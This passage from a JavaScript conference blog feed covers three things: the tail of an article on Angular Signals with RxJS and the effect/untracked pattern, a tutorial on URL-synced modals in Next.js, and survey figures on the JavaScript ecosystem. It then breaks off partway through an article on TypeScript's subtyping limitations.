The mergeMap and concatMap operators execute all requests: the former in parallel and the latter sequentially. The exhaustMap operator ignores further requests as long as one is running. These options are another reason for using RxJS and for the RxJS interop and rxMethod.
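
In condensed form, the four variants might be sketched like this (search$ stands in for a stream of filter values and load for a function returning an observable HTTP request; both are hypothetical):

search$.pipe(switchMap((f) => load(f)));  // cancel the running request, keep only the latest
search$.pipe(mergeMap((f) => load(f)));   // run all requests in parallel
search$.pipe(concatMap((f) => load(f)));  // queue requests, run them sequentially
search$.pipe(exhaustMap((f) => load(f))); // ignore new requests while one is still running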

Another strategy often used in addition or as an alternative is a flag that indicates if the application is currently communicating with the backend.

Listing 3

loadRatings(): void {
  patchState(store, { loading: true });

  ratingService.loadExpertRatings().subscribe({
    next: (ratings) => {
      patchState(store, { ratings, loading: false });
    },
    error: (error) => {
      patchState(store, { loading: false });
      toastService.show('Error loading ratings!');
      console.error(error);
    },
  });
},

Depending on the flag's value, the application can display a loading indicator or deactivate the respective button. The latter is counterproductive, or even impossible, in a highly reactive UI that works without an explicit button.

Tip 3: Signals as triggers

As mentioned earlier, Signals are especially suitable for transporting data to the view, as seen on the right in Figure 1. Real events, whether UI events or events represented with RxJS, are the better solution for transmitting an intention. There are several reasons why: First, Signals' glitch-free property can reduce consecutive changes to the last change.

Second, consumers must subscribe to the Signal in order to react to value changes. This requires an effect that triggers the desired action and writes the result to a signal. Effects that write to Signals are not welcome. By default, they are even penalized by Angular with an exception. The Angular team wants to avoid confusing reactive chains: changes that lead to changes, which in turn lead to further changes.

On the other hand, Angular is converting more and more APIs to signals. One example is Signals that can be bound to form fields or Signals that represent passed values (inputs). In most cases, you could argue that instead of listening for the Signal, you can also use the event that led to the Signal change. But in some cases, this is a detour that bypasses the new signal-based APIs.

Listing 4 shows an example of a component that receives the ID of a data set to be displayed as an input signal. The router takes this ID from a routing parameter. This is possible with the relatively new feature withComponentInputBinding.

Listing 4

@Component({ […] })
export class DessertDetailComponent implements OnChanges {

  store = inject(DessertDetailStore);

  dessert = this.store.dessert;
  loading = this.store.loading;

  id = input.required({
    transform: numberAttribute
  });
  
  […]
}

This component's template lets you page through the data records. This logic is deliberately implemented very simply for this example:

<button [routerLink]="['..', id() + 1]" >
  Next
</button>

When paging, the input signal id receives a new value. Now, the question arises as to how to trigger the loading of the respective data set in the event of this kind of change. The classic procedure is using the lifecycle hook ngOnChanges:

ngOnChanges(): void {
  const id = this.id();
  this.store.load(id);
}

For the time being, there's nothing wrong with this. However, the planned signal-based components will no longer offer this lifecycle hook. The RFC proposes effects as a replacement.

To escape this dilemma, an rxMethod (e.g. offered by a signal store) can be used:

constructor() {
  this.store.rxLoad(this.id);
}

It should be noted that the constructor transfers the entire signal and not just its current value. The rxMethod subscribes to this Signal and forwards its values to an observable that is used within the rxMethod.

If you don’t want to use the signal store, you can instead use the RxJS interop discussed above and convert the signal into an observable with toObservable.
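
A sketch of this variant, based on the component from Listing 4 (toObservable must be called in an injection context; the resulting observable completes when that context is destroyed, so no manual unsubscribe is needed here):

import { toObservable } from '@angular/core/rxjs-interop';

constructor() {
  toObservable(this.id).subscribe((id) => this.store.load(id));
}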

If you don’t have a reactive method to hand, you might be tempted to define an effect for this task:

constructor() {
  effect(() => {
    this.store.load(this.id());
  });
}

Unfortunately, this leads to the exception in Figure 2.

Fig. 2: Signals in Angular-Error message when using effect.

Fig. 2: Error message when using effect

This problem arises because the entire load method that writes a Signal in the store is executed in the reactive context of the effect. This means that Angular recognizes an effect that writes to a Signal. This has to be prevented by default for the reasons above. It also means that Angular triggers the effect again even if a Signal read in load changes.

Both problems can be prevented by using the untracked function (Listing 5).

Listing 5

constructor() {
  // try to avoid this
  effect(() => {
    const id = this.id();
    untracked(() => {
      this.store.load(id);
    });
  });
}

With this common pattern, untracked ensures that the reactive context does not spill over to the load method. load can write to Signals, and the effect doesn't register for the Signals that load reads. Angular only triggers the effect again when the Signal id changes, since it is read outside of untracked.

Unfortunately, this code is not especially easy to read. It’s a good idea to hide it behind a helper function:

constructor() {
  explicitEffect(this.id, (id) => {
    this.store.load(id);
  });
}

The auxiliary function explicitEffect receives a signal and subscribes to it with an effect. The effect invokes the passed lambda expression inside untracked (Listing 6).

Listing 6

import { Signal, effect, untracked } from "@angular/core";

export function explicitEffect<T>(source: Signal<T>, action: (value: T) => void) {
  effect(() => {
    const s = source();
    untracked(() => {
      action(s)
    });
  });
}

Interestingly, the explicit declaration of the Signals to be observed corresponds to the standard behavior of effects in other frameworks, like Solid. The combination of effect and untracked shown is also used in many libraries. Examples include the classic NgRx store, the RxJS interop mentioned above, the rxMethod, or the open source library ngxtension, which offers many extra functions for Signals.

iJS Newsletter

Keep up with JavaScript’s latest news!

To summarize

RxJS and Signals harmonize wonderfully together and the RxJS interop from Angular gives us the best of both worlds. Using RxJS is recommended for representing events. For processing asynchronous tasks, RxJS or stores (which can be based on RxJS) are recommended. The synchronous transport of data to the view should be handled by Signals. Together, RxJS, stores, and Signals are the building blocks for establishing a unidirectional data flow.

The flattening operators in RxJS can also elegantly avoid race conditions. Alternatively or in addition to this, flags can be used to indicate if a request is currently in progress at the backend.

Even if Signals weren’t primarily created to display events, there are cases when you want to react to changes in a Signal. This is the case with framework APIs based on Signals. In addition to the RxJS interop, the rxMethod from the Signal Store can also be used. Another option is the effect/untracked pattern for implementing effects that only react to explicitly named Signals.

The post Professional Tips for Using Signals in Angular appeared first on International JavaScript Conference.

]]>
Shareable Modals in Next.js: URL-Synced Overlays Made Easy https://javascript-conference.com/blog/shareable-modals-nextjs/ Mon, 17 Feb 2025 14:03:07 +0000 https://javascript-conference.com/?p=107476 Modals are a cornerstone of interactive web applications. However, managing their state, making them shareable, and preserving navigation can be complex. Next.js simplifies this with intercepting and parallel routes, enabling deep-linked, URL-synced modals. Together, we’ll build a dynamic feedback modal system with TailwindCSS that can be accessed, shared, and navigated effortlessly, improving both user experience and developer productivity.

The post Shareable Modals in Next.js: URL-Synced Overlays Made Easy appeared first on International JavaScript Conference.

]]>
Modals are essential UI components in web applications, often used for tasks such as displaying additional information, capturing user input, or confirming actions. However, traditional approaches to managing modals present challenges such as maintaining state, handling navigation, and ensuring that context is preserved on refresh.

With Next.js, intercepting and parallel routes introduce a powerful way to make modals URL-synced and shareable. This enables seamless deep linking, backward navigation to close modals, and forward navigation to reopen them – all without compromising the user experience.

In this article, we’ll walk through the process of building a dynamic feedback modal in Next.js. Along the way, we’ll explore advanced techniques, accessibility best practices, and tips for improving your modals for production-ready applications.

Why shareable modals matter

Modals have become an essential feature of modern web applications. Whether it’s a login form, product preview, or feedback submission, modals allow users to interact with your application without leaving the current page. But as simple as modals may seem, traditional implementations can present significant challenges for both users and developers.

Challenges with traditional modals

1. State management in large applications:

Most modal implementations rely on the client-side state to keep track of whether the modal is open or closed. In small applications, this is manageable using tools like React’s “useState” or the Context API. However, in larger applications with multiple modals, this approach becomes complex and error-prone. For example:

  • You may need to manage overlapping modal states across different components.
  • Global state management solutions such as Redux or Zustand can help, but they add unnecessary complexity for something as simple as opening or closing a modal.

2. Refresh behaviour:

Traditional modals lose their state when the page is refreshed. For example:

  • A user clicks a “Give Feedback” button, opening a modal.
  • They refresh the page, expecting the modal to stay open, but instead, it closes because the client-side state is reset. This disrupts the user experience, forcing users to repeat actions or lose their place in the workflow.

3. Inability to share modal states via URLs:
Consider a scenario where a user wants to share a particular modal with a colleague. With traditional client-side modals, there’s no URL representing the modal state, so the user can’t share or bookmark the modal. This makes the application less versatile and harder to navigate for users who expect modern, shareable interfaces.

How Next.js solves these challenges

Next.js provides a routing system that integrates seamlessly with modals, solving the challenges above. By leveraging features like intercepting routes and parallel routes, you can implement modals that are URL-synced, shareable, and persistent.

1. URL-based state for deep linking:
In Next.js, modal states can be tied directly to URLs. For example:
In Next.js, modal states can be tied directly to URLs. For example:

  • Navigating to /feedback can open a feedback form modal.
  • This URL can be shared or bookmarked, and refreshing the page will keep the modal open.
    This is achieved by associating modal components with specific routes in your file system, giving the modal a dedicated URL.

2. Preserving context and consistent navigation:
Unlike traditional modals, Next.js maintains navigation consistency. For example:
Unlike traditional modals, Next.js maintains navigation consistency. For example:

  • Pressing the back button closes the modal instead of navigating to the previous page.
  • Navigating forward reopens the modal, maintaining the user flow.
    These behaviours are automatically handled by Next.js’ routing system, reducing the need for custom logic and improving the user experience.

iJS Newsletter

Keep up with JavaScript’s latest news!

Next.js functions for creating shareable modals

Intercepting routes

Intercepting routes in Next.js allows you to “intercept” navigation to a specific route and render additional UI, such as a modal, without replacing the current page content. This is done using a special folder naming convention in your file system.

Implementation:

Intercepting route folder:

  • To create an interception route, use a folder prefixed with (.).
  • For example, if you wanted to intercept navigation to “/feedback” and display it as a modal, you would create the following structure:
    app
    ├── @modal
    │   ├── (.)feedback
    │   │   └── page.tsx
    │   └── default.tsx
    ├── feedback
    │   └── page.tsx
  • app/feedback/page.tsx renders the full-page version of the feedback form.
  • app/@modal/(.)feedback/page.tsx renders the modal version.

Route behaviour:

  • Navigating directly to /feedback will render the full page (app/feedback/page.tsx).
  • Clicking on a “Give Feedback” button navigates to /feedback, but renders the modal (app/@modal/(.)feedback/page.tsx).

Example modal file:

Listing 1: 

import { Modal } from '@/components/modal';  
export default function FeedbackModal() {  
  return (  
    <Modal>  
      <h2 className="text-lg font-bold">Give Feedback</h2>  
      <form className="mt-4 flex flex-col gap-4">  
        <textarea  
          placeholder="Your feedback..."  
          className="border rounded-lg p-2"  
        />  
        <button  
          type="submit"  
          className="bg-blue-500 text-white py-2 px-4 rounded-lg"  
        >  
          Submit  
        </button>  
      </form>  
    </Modal>  
  );  
}  

Parallel routes

Parallel routes allow multiple routes to be rendered simultaneously in different “slots” of the UI. This feature is particularly useful for rendering modals without disrupting the main layout.

Implementation:

Create a slot:

  • Parallel routes are implemented using folders prefixed with @. For example, @modal defines a slot for modal content.
  • In the root layout, you can include the modal slot next to the main page content.

Example layout file:

Listing 2:

// app/layout.tsx
import "./globals.css";

export default function RootLayout({
  modal,
  children,
}: {
  modal: React.ReactNode;
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body>
        <div>{modal}</div>
        <main>{children}</main>
      </body>
    </html>
  );
}

Fallback content:

  • Define a default.tsx file in the @modal folder to specify the fallback content when the modal is not active.

Listing 3:

// app/@modal/default.tsx
export default function Default() {
  return null; // No modal by default
}

 

Why these features matter

Intercepting routes in Next.js enable dynamic modal rendering without disrupting the layout of the main application. They allow you to associate specific modal components with their own URLs, making it possible to implement deep linking and sharing for modals. This ensures that users can navigate directly to a specific modal or share its state via a URL.

Parallel routes, on the other hand, separate the rendering logic of modals from the rest of the application. By isolating modal behaviour into its own designated slot, parallel routes simplify development and improve maintainability. This separation ensures that modals can be rendered independently, without interfering with the layout or functionality of other parts of the application.

By combining intercepting and parallel routes, Next.js transforms the way modals are implemented. These features make modals more user-friendly by supporting modern navigation patterns and sharing capabilities, while also enhancing developer efficiency through cleaner, more modular code.

iJS Newsletter

Keep up with JavaScript’s latest news!

Building a feedback modal in Next.js with TailwindCSS

Step 1: Setting up the /feedback route

The /feedback route serves as the main feedback page. TailwindCSS is used to style the form and layout.

Listing 4:

// app/feedback/page.tsx
export default function FeedbackPage() {
  return (
    <main className="flex flex-col items-center justify-center min-h-screen bg-gray-100">
      <h1 className="text-2xl font-bold text-gray-800">Feedback</h1>
      <p className="text-gray-600">We’d love to hear your thoughts!</p>
      <form className="mt-4 flex flex-col gap-4 w-full max-w-md">
        <textarea
          className="border border-gray-300 rounded-lg p-2 resize-none focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Your feedback..."
          rows={4}
        />
        <button
          type="submit"
          className="bg-blue-500 text-white py-2 px-4 rounded-lg hover:bg-blue-600 transition"
        >
          Submit
        </button>
      </form>
    </main>
  );
}

Step 2: Define the @modal slot

The @modal slot ensures that no modal is rendered unless explicitly triggered.

Listing 5:

// app/@modal/default.tsx
export default function Default() {
  return null; // Ensures the modal is not active by default
}

EVERYTHING ABOUT REACT & NEXT.JS

Explore the iJS React.js & Next.js Track

Step 3: Implement the modal in the /(.)feedback folder

This step uses the intercepting route pattern (.) to render the modal in the @modal slot.

Listing 6:

// app/@modal/(.)feedback/page.tsx
import { Modal } from '@/components/modal';

export default function FeedbackModal() {
  return (
    <Modal>
      <h2 className="text-lg font-bold text-gray-800">Give Feedback</h2>
      <form className="mt-4 flex flex-col gap-4">
        <textarea
          className="border border-gray-300 rounded-lg p-2 resize-none focus:outline-none focus:ring-2 focus:ring-blue-500"
          placeholder="Your feedback..."
          rows={4}
        />
        <button
          type="submit"
          className="bg-blue-500 text-white py-2 px-4 rounded-lg hover:bg-blue-600 transition"
        >
          Submit
        </button>
      </form>
    </Modal>
  );
}

Step 4: Create the reusable modal component

The modal is styled using TailwindCSS for a modern and accessible design.

Listing 7:

// components/modal.tsx
'use client';

import { useRouter } from 'next/navigation';

export function Modal({ children }: { children: React.ReactNode }) {
  const router = useRouter();

  return (
    <div className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50">
      <div className="bg-white rounded-lg shadow-lg max-w-md w-full p-6 relative">
        <button
          onClick={() => router.back()}
          aria-label="Close"
          className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
        >
          ✖
        </button>
        {children}
      </div>
    </div>
  );
}

Step 5: Update the layout for parallel routing

In the layout, the @modal slot is rendered next to the primary children

Listing 8:

// app/layout.tsx
import Link from 'next/link';
import './globals.css';

export default function RootLayout({
  modal,
  children,
}: {
  modal: React.ReactNode;
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body className="bg-gray-100 text-gray-900">
        <nav className="bg-gray-800 p-4 text-white">
          <Link
            href="/feedback"
            className="hover:underline text-white"
          >
            Give Feedback
          </Link>
        </nav>
        <div>{modal}</div>
        <main className="p-4">{children}</main>
      </body>
    </html>
  );
}

You can find the complete implementation using TailwindCSS, including accessibility enhancements, on my GitHub repository.

Advanced features and enhancements

Accessibility improvements

Accessibility is critical when creating modals. Without proper implementation, modals can confuse users, especially those who rely on screen readers or keyboard navigation. Here are some key practices to ensure that your modal is accessible:

Focus management

When a modal is opened, the focus should be moved to the first interactive element within the modal, and users should not be able to interact with elements outside the modal. In addition, when the modal is closed, the focus should return to the element that triggered it.

This can be achieved by using JavaScript to trap focus within the modal:

Listing 9:

// Updated Modal Component with Focus Management
'use client';

import { useEffect, useRef } from 'react';
import { useRouter } from 'next/navigation';

export function Modal({ children }: { children: React.ReactNode }) {
  const router = useRouter();
  const modalRef = useRef<HTMLDivElement>(null);

  useEffect(() => {
    const focusableElements = modalRef.current?.querySelectorAll(
      'button, [href], input, textarea, select, [tabindex]:not([tabindex="-1"])'
    );
    const firstElement = focusableElements?.[0] as HTMLElement;
    const lastElement = focusableElements?.[focusableElements.length - 1] as HTMLElement;

    // Trap focus within the modal
    function handleTab(e: KeyboardEvent) {
      if (!focusableElements || focusableElements.length === 0) return;

      if (e.key === 'Tab') {
        if (e.shiftKey && document.activeElement === firstElement) {
          e.preventDefault();
          lastElement?.focus();
        } else if (!e.shiftKey && document.activeElement === lastElement) {
          e.preventDefault();
          firstElement?.focus();
        }
      }
    }

    // Set initial focus to the first interactive element
    firstElement?.focus();

    window.addEventListener('keydown', handleTab);
    return () => window.removeEventListener('keydown', handleTab);
  }, []);

  return (
    <div
      ref={modalRef}
      role="dialog"
      aria-modal="true"
      className="fixed inset-0 flex items-center justify-center bg-black bg-opacity-50 z-50"
    >
      <div className="bg-white rounded-lg shadow-lg max-w-md w-full p-6 relative">
        <button
          onClick={() => router.back()}
          aria-label="Close"
          className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
        >
          ✖
        </button>
        {children}
      </div>
    </div>
  );
}

Focus trapping is essential for maintaining a seamless and accessible user experience when working with modals. It ensures that users cannot accidentally navigate or interact with elements outside the modal while it is open, preventing confusion and unintended actions. Additionally, returning focus to the element that triggered the modal provides a smooth transition when the modal is closed, helping users reorient themselves and continue interacting with the application without disruption. These practices enhance both usability and accessibility, creating a more polished and user-friendly interface.

ARIA attributes

Using semantic HTML and ARIA attributes ensures that screen readers understand the structure and purpose of the modal.

  • Add role=”dialog” to the modal container to define it as a dialog window.
  • Use aria-modal=”true” to indicate that interaction with elements outside the modal is restricted.

Why this is important:
ARIA attributes provide assistive technologies such as screen readers with the necessary context to communicate the purpose of the modal to the user. This ensures a consistent and inclusive user experience.

Error handling and edge cases

Handling edge cases ensures that your modal behaves predictably in all scenarios. Here are some considerations:

Handle Refreshes

Since the modal state is tied to the URL, refreshing the page should display the appropriate content. In Next.js, this happens naturally due to the server-rendered /feedback route and the modal implementation.

Close modal on invalid routes

If the user navigates to an invalid route, the modal should close or render nothing. A catch-all route ([...catchAll]) in the @modal slot ensures this:

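// e.g. app/@modal/[...catchAll]/page.tsx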
export default function CatchAll() {
  return null; // Ensures the modal slot is empty
}

Smooth navigation

Ensure that navigating to another part of the application closes the modal. Using router.back() in the modal close button ensures that the user is returned to the previous route.

Listing 10:

<button
  onClick={() => router.back()}
  aria-label="Close"
  className="absolute top-2 right-2 text-gray-400 hover:text-gray-600"
>
  ✖
</button>

Why it matters:

Graceful navigation plays a key role in providing a consistent and predictable user experience, even when users interact with modals in unexpected ways. By ensuring that modal behaviour aligns with navigation actions, such as using the back or forward buttons, users can move through the application naturally without encountering inconsistencies.

Catch-all routes further enhance robustness by preventing unnecessary or unintended content from being rendered in the modal slot. They act as a safeguard, ensuring that only valid routes display content, while invalid or undefined routes leave the modal slot empty. Together, these strategies create a more reliable and user-friendly application.

EVERYTHING ABOUT REACT & NEXT.JS

Explore the iJS React.js & Next.js Track

Comparison and use cases

Comparison: URL-synced modals vs. traditional client-side modals

When building modals, developers often rely on client-side state management to control their visibility. While this approach is straightforward, it has several limitations compared to URL-synced modals in Next.js:

| Feature | Client-side modals | URL-synced modals in Next.js |
| --- | --- | --- |
| Deep linking | Not supported. Users can't share or bookmark the modal state. | Fully supported. Modal states are linked to specific URLs. |
| Refresh behaviour | When the page is refreshed, the modal state is reset and closed. | The modal state persists across refreshes. |
| Navigation consistency | Backwards or forward navigation cannot close or reopen the modal. | Modals respect browser navigation, closing or reopening correctly. |
| Scalability | State management for complex modals can be difficult in large applications. | Simplified state management using URL routes. |
| SEO and accessibility | Modals are not indexed or accessible via URLs. | Can be indexed and shared where appropriate. |

Why URL-synchronised modals are important:

These features significantly enhance the user experience by enabling deep linking, allowing users to share and bookmark specific modal states with ease. Navigation consistency ensures that actions like using the back or forward buttons behave as expected, seamlessly opening or closing modals without disrupting the flow of the application. For developers, Next.js simplifies state management by leveraging its routing mechanisms, eliminating the need for complex custom logic to control modal behaviour. This combination of improved usability and reduced development complexity makes Next.js an ideal framework for building modern, shareable modals.

Practical use cases for URL-synced modals

Next.js makes URL-synced modals versatile and scalable. Here are a few common use cases:

Feedback forms

As this article shows, feedback forms are ideal for modals. Users can easily share a link to the form (/feedback), and the form remains accessible even after a page refresh.

Photo galleries with previews

Imagine a gallery where users can click on a thumbnail to open a photo preview in a modal. With URL-synchronised modals:

  • Clicking on a photo updates the URL (e.g. /gallery/photo/123).
  • Users can share the link, allowing others to view the photo directly.
  • Navigating backwards or forwards closes or reopens the modal.

Shopping Cart and Side Panels

E-commerce applications often use modals for shopping carts. With URL-synced modals:

  • The cart can be linked to a route such as /cart.
  • Users can share their cart link with preloaded items.
  • Refreshing the page keeps the cart open, preventing it from losing its state.

Authentication and login

For applications that require authentication, login forms can be presented as modals. A user clicking “Login” could open a modal linked to “/login.” When the modal is closed or the user navigates elsewhere, the state remains predictable.

Notifications and Wizards

  • Notifications: Display announcements or updates in a modal tied to a route, such as /announcement.
  • Onboarding Wizards: Guide users through a multistep onboarding process, with each step linked to a unique URL (e.g. /onboarding/step-1).

When to avoid URL-synced modals

Although URL-synced modals are powerful, they are not appropriate for every scenario. Consider avoiding them in the following cases:

  • Highly transient states: Modals used for brief interactions (such as confirming a delete action) may not require URL updates.
  • Sensitive data: If the modal contains sensitive information, ensure that deep linking and sharing are restricted.
  • Non-navigable workflows: If the modal does not require navigation controls (e.g. forward/backwards), simpler client-side modals may be sufficient.

With these comparisons and use cases, developers can make informed decisions about when and how to implement URL-synced modals in their Next.js projects.

iJS Newsletter

Keep up with JavaScript’s latest news!

Conclusion

URL-synchronised modals in Next.js provide a modern solution to the common challenges developers face when implementing modals in web applications. By leveraging features such as intercepting and parallel routes, Next.js enables deep linking, navigation consistency, and improved user experience – all while simplifying state management.

Key Takeaways

  1. Improved user experience:
    URL-synchronised modals allow users to share, bookmark, and revisit specific modal states without breaking functionality. They also respect browser navigation, ensuring that modals open and close as expected.
  2. Simplified state management:
    By tying modal states to the URL, developers can avoid the complexity of managing client-side state for modals in large applications.
  3. Broad applicability:
    From feedback forms and photo galleries to shopping carts and onboarding wizards, URL-synced modals provide a scalable and reusable solution for multiple use cases.

Recommendations:

  • Use Next.js’ intercepting and parallel routes to create modals that integrate seamlessly into your application.
  • Focus on accessibility by implementing ARIA roles, focus trapping, and logical navigation.
  • Evaluate whether URL-synced modals are appropriate for your specific use case, especially when dealing with transient or sensitive data.

For a complete example of building a feedback modal with URL-synced functionality in Next.js, check out my GitHub repository.

If you’re ready to take your Next.js projects to the next level, try implementing URL-synced modals today. They are not only user-friendly but also developer-friendly, making them a great addition to any modern web application.

 

The post Shareable Modals in Next.js: URL-Synced Overlays Made Easy appeared first on International JavaScript Conference.

]]>
The 2024 State of JavaScript Survey: Who’s Taking the Lead? https://javascript-conference.com/blog/state-of-javascript-ecosystem-2024/ Wed, 05 Feb 2025 10:48:23 +0000 https://javascript-conference.com/?p=107421 Dominating frontend development, JavaScript continues to be one of the most widely used programming languages and the cornerstone of web development. As we step into 2025, we’ll take a closer look at the state of JavaScript in 2024, highlighting the major trends and the most popular frameworks so you can stay ahead of the curve.

The post The 2024 State of JavaScript Survey: Who’s Taking the Lead? appeared first on International JavaScript Conference.

]]>
The State of Developer Ecosystem Report 2024 by JetBrains gives a snapshot of the developer world, based on insights from 23,262 developers worldwide. The survey shows that JavaScript remains the most-used programming language globally, with 61% of developers using it to build web pages.


Figure 1: Which programming languages have you used in the last 12 months? (source: JetBrains)

Key Takeaways

  • Demographically, the U.S. represented a large share of respondents with 15%, followed by Germany at 8%, France at 7%, and Spain and the United Kingdom at 4% each.
  • The average age of survey respondents was 33.5 years. Age and income were positively correlated, and younger respondents showed more gender diversity, suggesting changing demographics.
  • 51% of participants had 10 years or less of experience, while 33% had between 10 and 20 years of experience.
  • 95% of respondents used JavaScript in a professional capacity, and 40% used it as a hobby in 2024, up from 91% and 37% in 2023.
  • 98% reported using JavaScript for frontend development and 64% for backend. Additionally, 26% used it for mobile apps and 18% for desktop apps.

Figure 2: JavaScript use case (source: State of JS)

 

The most common application patterns remain the classic ones: Single-Page Apps (90%) and Server-Side Rendering (59%). Static Site Generation came in third position with 46%.

The survey also looked at AI usage to generate code. 20% of respondents said they never use it for coding, while 7% reported using it about half the time.

iJS Newsletter

Keep up with JavaScript’s latest news!

TypeScript vs. JavaScript

TypeScript has seen impressive growth, as its adoption has risen from 12% in 2017 to 35% in 2024, according to JetBrains’ report. 67% of respondents reported writing more TypeScript than JavaScript code, and the largest group consists of people who only write TypeScript.

Figure 3: TypeScript usage (source: State of JS)

 

TypeScript’s popularity is due to its enhanced features to write better JavaScript code. It detects errors early during development, improves code quality, and makes long-term maintenance easier, which is a huge plus for developers. However, TypeScript isn’t here to replace JavaScript. They’ll just coexist, giving developers more options based on what they need and prefer.

Libraries and Frameworks

Webpack is the most used JavaScript tool, as 85.3% of respondents reported using it. However, Vite takes the lead for the most loved, earning 56% of positive feedback. Despite being relatively new, Vite is also the third most used tool with 78.1% adoption.

React came in second for both most used (81.1%) and most loved (46.7%). 

Angular, on the other hand, ranked eighth with 50.1% usage and 23.3% positive feedback, falling behind tools like Jest, Next.js, Storybook, and Vue.js.


Figure 4: Libraries experience grouped by usage (source: State of JS)

Figure 5: Libraries experience grouped by sentiment (source: State of JS)

The survey also highlights usage trends of frontend frameworks over time. While React remains in the top spot, Vue.js continues to overtake Angular, holding on to its position as the second most used framework.

React keeps reinventing itself, transitioning from being just a library to evolving into a specification for frameworks. With the release of version 19 in December, it introduced support for web components along with new hooks and form actions that redefine how forms are handled in React. 

Vue.js’ popularity can be attributed to its flexible, comprehensive, and advanced features, which appeal to both beginners and experienced developers. Daniel Roe from the Nuxt core team credits the ecosystem’s growth to its UI libraries, with Tailwind CSS playing a key role. Its convention-based approach and cross-framework compatibility make it easier to port libraries like Radix Vue from their React counterparts. 

Angular’s third-place ranking is still a good position, as many developers and companies continue to use it for its performance, safety, and scalability. Its ecosystem, TypeScript integration, and features like dependency injection still make it an attractive choice for web development.  

Svelte’s usage is also growing steadily, with developers showing increasing favor for it after it released version 5 in October. According to Best of JS, one of its major highlights is the introduction of “runes,” a new mechanism for declaring reactive state.

Figure 6: Frontend frameworks ratios over time (source: State of JS)

iJS Newsletter

Keep up with JavaScript’s latest news!

Challenges and Limitations  

When asked about their biggest struggle with JavaScript, 32% of respondents pointed to the lack of a built-in type system, far ahead of browser support issues, which only 8% mentioned.

Regarding browser APIs, poor browser support was the biggest issue for 35% of respondents. Safari and the lack of documentation on browser features also came up as common problems with 6% and 5% mentions, respectively.

React, as the most used frontend framework, was also the most criticized, with 14% of respondents complaining about having issues with it. Common issues related to frameworks included excessive complexity, poor performance, choice overload, and breaking changes.

It’s exciting to see how the JavaScript ecosystem will develop in 2025, unlocking new possibilities for web development. The growing use of TypeScript will solidify as a standard for large-scale applications due to its type safety and improved developer tooling. We’ll also see the rise of server-side rendering (SSR) frameworks like Next.js and Nuxt.js, enhancing both performance and SEO. Additionally, React and Angular will continue to push forward with updates focused on optimizing the developer experience and simplifying app development. If you’re interested in diving deeper into these topics, make sure to check out our conference program for more insights and expert-led sessions!

If you want to get more details, check the JavaScript Survey page.

The post The 2024 State of JavaScript Survey: Who’s Taking the Lead? appeared first on International JavaScript Conference.

]]>
TypeScript’s Limitations and Workarounds https://javascript-conference.com/blog/typescript-limitations-workarounds/ Mon, 16 Dec 2024 14:20:26 +0000 https://javascript-conference.com/?p=107028 TypeScript, while a powerful programming language, has limitations that arise from its type system's attempt to manage dynamically typed JavaScript code. From handling return types and function expressions to the behavior of else statements, developers often encounter challenges when working with TypeScript files. Issues can emerge at compile time, especially when using generic functions, creating an instance, or managing type information. This article explores the blind spots in TypeScript, such as handling function objects, top-level constructs, and dynamically typed scenarios, offering insights into workarounds and practical solutions.

The post TypeScript’s Limitations and Workarounds appeared first on International JavaScript Conference.

]]>
TypeScript’s type system effectively manages much of JavaScript’s dynamism in useful ways, rather than eliminating it. Developers writing TypeScript code can use almost the full range of web technologies in a type-safe manner. However, when issues arise, they’re often the result of the developer’s choices, not the tools themselves.

Most developers follow well-established patterns in their day-to-day programming. Modern frameworks and tools provide solid structures to guide us, offering solutions and guidelines for nearly every question. However, the complexity and long history of the modern web platform ensure that surprises still occur and new, sometimes unsolvable, challenges continue to emerge.

This issue extends beyond people to include their tools and machines. No one can do everything, and certainly, not every tool is suited to every task. TypeScript is no exception: while it can accurately describe 99% of JavaScript features, one percent remains beyond its grasp. This gap doesn’t only consist of reprehensible anti-features. Some JavaScript features that TypeScript doesn’t fully understand can still be useful. Additionally, for some other features, TypeScript operates under assumptions that can’t always align with reality.

Like any tool, TypeScript isn’t perfect; and we should be aware of its blind spots. This article addresses three of these blind spots, offers possible workarounds, and explores the implications of encountering them in our code.

Blind Spot 1: Excluding subtypes in type parameters

The Liskov substitution principle requires that a program can handle subtypes of T wherever a type T is expected. The classic example of object orientation still serves as the best illustration of this principle (Listing 1).

Listing 1: The classic OOP example with animals

class Dog {
  name: string;
  constructor(name: string) {
    this.name = name;
  }
}

class Collie extends Dog {
  hair = "long";
}

let myDog: Dog = new Collie("Lassie");
// Works!

It makes perfect sense that a Collie instance is assigned to a variable of type Dog, because a Collie is a dog with long hair. The object that ends up in the myDog variable provides all the functions required by the Dog type annotation. The fact that the object can do more (for example, show off long hair) is irrelevant in this context. But what if that additional feature does matter?

Thanks to structural subtyping, TypeScript allows any object that fulfills a given API contract (or implements a given interface) to be treated as a “subtype” (Listing 2).

Listing 2: Structural subtyping in Action

class Dog {
  name: string;
  constructor(name: string) {
    this.name = name;
  }
}

type Cat = { name: string };

let myPet: Cat = new Dog("Lassie");
// Works!

In web development, where developers don’t have to manually create every object from a class constructor, this rule is very pragmatic. On one hand, it results in relatively minor semantic errors (Listing 3), but on the other, it can also lead to more significant pitfalls.

Listing 3: Structural subtyping triggers an error

type RGB = [number, number, number];
let green: RGB = [0, 100, 0];

type HSL = [number, number, number];
let red: HSL = [0, 100, 50];

red = green;
// Works! RGB and HSL have the same structure
// But is that OK at runtime?

Let's look at a function that accepts a parameter of type WeakSet<any>:

function takesWeakSet(m: WeakSet<any>) {}

In JavaScript, weak sets are sets with special garbage collection features. They only hold weak references to their contents and can’t cause memory leaks. However, unlike normal sets, weak sets lack many features, mainly all iteration mechanisms. While normal sets can function as universal lists as well as sets, weak sets can only tell us whether they contain a given value, something normal sets can do too. This means that the WeakSet API is a subset of the Set API, meaning that Set is a subtype of WeakSet (Listing 4).

Listing 4: WeakSets and Sets as subtypes

function takesWeakSet(m: WeakSet<any>) {}

// Works obviously
takesWeakSet(new WeakSet());

// Works too, Set is a subtype of WeakSet
takesWeakSet(new Set());

// But is that OK at runtime?

Depending on the function’s intent, this can either be a non-issue (as with Dog and Collie), an easily identifiable problem (as with RGB and HSL), or it can lead to subtle, undesired behavior in our program. When takesWeakSet() expects to receive a true WeakSet, it might store new values in the set and assume that it doesn’t need to worry about removing them later. After all, weak sets automatically prevent memory leaks. However, this assumption can be undermined if Set is considered a subtype of WeakSet.
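
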